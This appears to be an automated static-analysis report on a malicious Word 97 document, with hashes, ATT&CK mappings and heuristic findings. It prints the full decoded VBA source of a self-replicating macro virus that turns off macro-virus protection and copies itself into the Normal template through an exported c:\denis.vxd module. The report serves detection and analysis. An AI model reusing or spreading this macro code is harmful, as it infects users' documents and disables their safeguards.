Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0aac9ea16fd47cda…

MALICIOUS

Office (OLE)

109.5 KB Created: 2003-05-19 21:05:00 Authoring application: Microsoft Word 8.0 First seen: 2026-05-10
MD5: 3fe50579a07dc8ab3a5324e2ff74a7b9 SHA-1: c07bebf0358eca9f7140fcab1edd17f82c7569f9 SHA-256: 0aac9ea16fd47cda154b72b9783581eb071cc29df0b2bdf75404940c2b38eb36
108 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros that attempt to disable macro virus protection and replicate themselves to the Normal template using the 'AutoOpen' macro. The script also attempts to export and import a module named 'EgertonLab' and a file named 'denis.vxd' to the system, indicating a potential attempt at persistence or further infection.

Heuristics 4

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Application.Options.VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1209 bytes
SHA-256: d19862a71aff431f73ec3a529505d1574d686aa9648b76244a6967fbcd3fcfda
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "tchaTcho"
Sub AutoOpen()
On Error Resume Next
 
  Call yaSolo
End Sub



Sub yaSolo()
On Error Resume Next
Dim tchaTcho
Application.Options.VirusProtection = False
Application.Options.ConfirmConversions = False
Application.ActiveDocument.AcceptAllRevisions
ModulName = "EgertonLab"
FileName = "denis.vxd"
SiaBonga = "tchaTcho"
If MacroContainer = NormalTemplate Then
  Set carrier = NormalTemplate.VBProject.VBComponents
  Set host = ActiveDocument.VBProject.VBComponents
Else
  Set carrier = ActiveDocument.VBProject.VBComponents
  Set host = NormalTemplate.VBProject.VBComponents
End If
If host(ModulName).Name = ModulName Then
 host.Remove host(ModulName)
End If

If host(SiaBonga).Name <> SiaBonga Then
  carrier(SiaBonga).Export "c:\denis.vxd"
  host.Import ("c:\denis.vxd")
End If

If ActiveDocument.Content.Characters.Count = 0 Then ActiveDocument.Saved = True Else ActiveDocument.Save
End Sub